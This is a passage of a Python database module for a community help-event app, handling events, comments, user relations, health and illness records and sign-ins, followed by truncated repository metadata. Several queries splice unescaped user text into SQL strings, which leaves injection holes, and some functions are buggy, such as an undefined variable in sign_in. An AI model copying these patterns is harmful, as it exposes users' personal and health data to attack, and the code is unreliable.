get_event_information(event_info)\n if event_info is not None:\n event_list.append(event_info)\n return event_list\n\n\n'''\nget events that launch by user.\n@params includes user's id, \n option params includes state indicates all events or those starting or ended.\n type indicates type of events.\n@return an array of result event ids.\n'''\ndef get_launch_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select id from event where launcher = %d\"%data[KEY.ID]\n if KEY.STATE in data:\n if data[KEY.STATE] == 0 or data[KEY.STATE] == 1: \n sql += \" and state = %d\"%data[KEY.STATE]\n if KEY.TYPE in data:\n if data[KEY.TYPE] >= 0 and data[KEY.TYPE] <= 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nget user's follow or support events.\n@params includes user's id and type of user's state in event.\n user's state 0 indicates follow, and 1 indicates support.\n@return an array of result event ids.\n'''\ndef get_join_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select event_id from support_relation where supporter = %d\"%data[KEY.ID]\n if KEY.TYPE in data:\n if data[KEY.TYPE] == 1 or data[KEY.TYPE] == 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nmanage relation of user and event.\n@params\n@return\n'''\ndef user_event_manage(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.OPERATION not in data:\n return True\n if data[KEY.OPERATION] < 0 or data[KEY.OPERATION] > 2:\n return False\n sql = \"select launcher from event where id = %d\"\n launcher_id = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n launcher_id = sql_result[0]\n except:\n pass\n if launcher_id is None:\n return False\n if data[KEY.OPERATION] == 0:\n sql = \"delete from support_relation where event_id = %d and supporter = %d\"%(data[KEY.EVENT_ID], data[KEY.ID])\n else:\n sql = \"replace into support_relation (event_id, supportee, supporter, type, time) values (%d, %d, %d, %d, now())\"%(data[KEY.EVENT_ID], launcher_id, data[KEY.ID], data[KEY.OPERATION])\n try:\n dbhelper.execute(sql)\n except:\n return False\n\n #\n # trust and reputation compute here.\n #\n return True\n\n\n'''\nadd a new comment to a help event.\n@params includes event_id, represents comment belongs to which event,\n author, user's id, author of comment,\n content, content of comment.\n@return new comment id if succeed,\n -1 otherwise.\n'''\ndef add_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return -1\n if KEY.CONTENT not in data:\n return -1\n sql = \"insert into comment (event_id, author, content, time) values (%d, %d, '%s', now())\"\n try:\n comment_id = dbhelper.insert(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.CONTENT]))\n return comment_id\n except:\n return -1\n\n\n'''\nremove a comment from a help event by author him/her self.\n@params includes id, indicates author him/her self.\n event_id, indicates which event the comment belongs to.\n comment_id, indicates comment itself.\n@return True if delete successfully,\n False if fails.\n'''\ndef remove_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data or KEY.COMMENT_ID not in data:\n return False\n sql = \"delete from comment where id = %d and event_id = %d and author = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.COMMENT_ID], data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget comments of a help event.\n@params event_id, id of the help event.\n@return a list of comments. each comment contain all detail information.\n'''\ndef get_comments(data):\n if KEY.EVENT_ID not in data:\n return None\n comment_list = []\n comment = {}\n sql = \"select id from comment where event_id = %d order by time DESC\"\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.EVENT_ID]))\n for each_result in sql_result:\n for each_id in each_result:\n comment[KEY.COMMENT_ID] = each_id\n comment = get_comment_info(comment)\n if comment is not None:\n comment_list.append(comment)\n return comment_list\n except:\n return None\n\n\n'''\nget detail information of a comment.\n@params includes comment_id, id of comment.\n@return information of comment, includes id of comment,\n event_id, indicates which event belongs to,\n author_id, author's user id,\n author, nickname of author,\n content, main body of comment,\n time, add time of comment.\n None indicates a fail query. Maybe the chosen comment doesn't exist.\n'''\ndef get_comment_info(data):\n if KEY.COMMENT_ID not in data:\n return None\n sql = \"select event_id, author, content, time from comment where id = %d\"\n comment_info = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.COMMENT_ID]))\n if sql_result is not None:\n comment_info = {}\n comment_info[KEY.COMMENT_ID] = data[KEY.COMMENT_ID]\n comment_info[KEY.EVENT_ID] = sql_result[0]\n comment_info[KEY.AUTHOR_ID] = sql_result[1]\n comment_info[KEY.CONTENT] = sql_result[2]\n comment_info[KEY.TIME] = str(sql_result[3])\n user = {}\n user[KEY.ID] = comment_info[KEY.AUTHOR_ID]\n user = get_user_information(user)\n if user is not None:\n comment_info[KEY.AUTHOR] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return comment_info\n\n\n'''\nadd a static relation between two users. The relation is single direction.\n@params includes two users' id, one is called id, the other called user_id.\nparameter type indicates type of static relation. two users in one direction could only have one type of relation.\n type: 0 indicates family relation.\n 1 indicates geography relation.\n 2 indicates career, interest and general friend relation.\n@return True if successfully adds.\n False otherwise.\n'''\ndef add_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.TYPE not in data:\n return False\n sql = \"replace into static_relation (user_a, user_b, type, time) values (%d, %d, %d, now())\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID], data[KEY.TYPE]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\nremove a static relation of two user.\n@params includes two users' id, one is called id, the other called user_id.\n@return True if successfully removes.\n False otherwise.\n'''\ndef remove_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data:\n return False\n sql = \"delete from static_relation where user_a = %d and user_b = %d\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ngive an evaluation to a user in a help event.\n@params includes: id, evaluater.\n user_id, evaluatee.\n event_id, indicates the help event.\n value, the value of evaluation.\n@return True if successfully evaluate.\n Flase otherwise.\n'''\ndef evaluate_user(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.VALUE not in data:\n return False\n \n value_list = ast.literal_eval(data[KEY.VALUE])\n value = 0.0\n for each_value in value_list:\n value += each_value\n list_len = len(value_list)\n if list_len == 0:\n list_len = 1\n value /= list_len\n\n sql = \"replace into evaluation (event_id, from, to, value, time) values (%d, %d, %d, %f, now())\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.USER_ID], value))\n return True\n except:\n return False\n\n\n\n'''\nadd a health record of a user into database.\n@params includes id, user's id.\n type, type of health indicator.\n value, value of some health indicator.\n@return the health record id of the new record.\n -1 indicates fail.\n'''\ndef health_record(data):\n if KEY.ID not in data or KEY.TYPE not in data or KEY.VALUE not in data:\n return -1\n sql = \"insert into health (user_id, type, value, time) values (%d, %d, %f, now())\"\n record_id = -1\n try:\n record_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE], data[KEY.VALUE]))\n except:\n record_id = -1\n finally:\n return record_id\n\n\n'''\nget details of one certain health record.\n@params includes record_id, id of the health record.\n@return details of the health record, contains record id, user id, type, certain value and record time.\n None indicates fail query.\n'''\ndef get_health_record(record_id):\n sql = \"select id, user_id, type, value, time from health where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.HEALTH_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.TYPE] = sql_result[2]\n record[KEY.VALUE] = float(sql_result[3])\n record[KEY.TIME] = str(sql_result[4])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all health records of a user, but at most 100 records.\n@params includes id, user's id.\n@return a list that contain all health records. each element is a json that contains details information of a health record.\n None indicates fail query.\n'''\ndef get_health_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from health where user_id = %d order by time DESC limit %d\"\n sql_result = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n records = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_health_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\nadd an illness record of a user into database.\n@params includes id, user's id.\n content, illness detail information.\n@return illness record id.\n -1 indicates fail.\n'''\ndef illness_record(data):\n if KEY.ID not in data or KEY.CONTENT not in data:\n return -1\n sql = \"insert into illness (user_id, content, time) values (%d, '%s', now())\"\n illness_id = -1\n try:\n illness_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.CONTENT]))\n except:\n illness_id = -1\n finally:\n return illness_id\n\n\n'''\nget details of an illness record.\n@params includes record id, indicates which record to be queried.\n@return content of an illness record, includes record's id, user's id, illness content and illness time.\n None indicates fail query or no such record.\n'''\ndef get_illness_record(record_id):\n sql = \"select id, user_id, content, time from illness where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.ILLNESS_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.CONTENT] = sql_result[2]\n record[KEY.TIME] = str(sql_result[3])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all illness records of a user, but at most 100 records.\n@params includes: id, user's id.\n@return a list that contain all illness records. each element in the list is a json that is consist of details of an illness record.\n None indicates fail query.\n'''\ndef get_illness_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from illness where user_id = %d order by time ASC limit %d\"\n sql_result = None\n records = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_illness_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\ncreate a loving bank account. It contains loving bank and credit.\n@params includes user_id, user's id, initial coin number and initial score value.\n@return new bank account id if succeed.\n -1 if fail.\n'''\ndef create_loving_bank(data, init_coin=0, init_score=0):\n if KEY.ID not in data:\n return -1\n sql = \"insert into loving_bank (user_id, coin, score, ac_score) values (%d, %d, %d, %d)\"\n try:\n bank_account_id = dbhelper.insert(sql%(data[KEY.ID], init_coin, init_score, init_score))\n return bank_account_id\n except:\n return -1\n\n\n'''\nuser could sign in once a day. Especially, if user has signed in today, this method would return false.\n@params includes user_id. user's id.\n@return True if sign in successfully.\n False otherwise.\n'''\ndef sign_in(data):\n if KEY.ID not in data:\n return False\n if is_sign_in(user_id):\n return False\n sql = \"insert into sign_in (user_id, time) values (%d, now())\"\n try:\n sign_in_id = dbhelper.insert(sql%(data[KEY.ID]))\n if sign_in_id > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ncheck whether a user has signed in today.\n@params includes user_id. user's id.\n@return True if user has signed in.\n False otherwise.\n'''\ndef is_sign_in(user_id):\n result = False\n sql = \"select count(*) from sign_in where user_id = %d and to_days(time) = to_days(now())\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(user_id))[0]\n if sql_result > 0:\n result = True\n else:\n result = False\n except:\n result = False\n finally:\n return result\n\n\n", "repo_name": "hs-TA/ehelp_server", "sub_path": "database/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 25742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.KEY.ACCOUNT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 49, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 52, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 69, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 75, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 75, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 78, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 83, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 84, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 84, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY.GENDER", "line_number": 92, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 92, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 95, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY.AGE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 100, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 103, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY.PHONE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 108, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY.LOCATION", "line_number": 116, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 116, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 117, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 117, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 117, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 120, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 125, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 128, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 135, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 135, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 138, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 143, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 146, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 161, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 161, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 165, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY.SALT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 188, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.SALT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 195, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 195, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 197, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 197, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 211, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 211, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 211, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 215, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 231, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 231, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 235, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 240, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 241, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 241, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 242, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 242, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 243, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 243, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 246, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 246, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 247, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 247, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 250, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 251, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 252, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 252, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 270, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 275, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 294, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 294, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 295, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 295, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 298, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 303, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 306, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATE", "line_number": 311, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 311, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 312, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 312, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 313, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 316, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 332, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 336, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 350, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 350, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 355, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 355, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 358, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 358, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 360, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 362, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 364, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 364, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.KEY.FOLLOW_NUMBER", "line_number": 366, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 366, "usage_type": "name"}, {"api_name": "utils.KEY.SUPPORT_NUMBER", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.KEY.GROUP_PTS", "line_number": 368, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 368, "usage_type": "name"}, 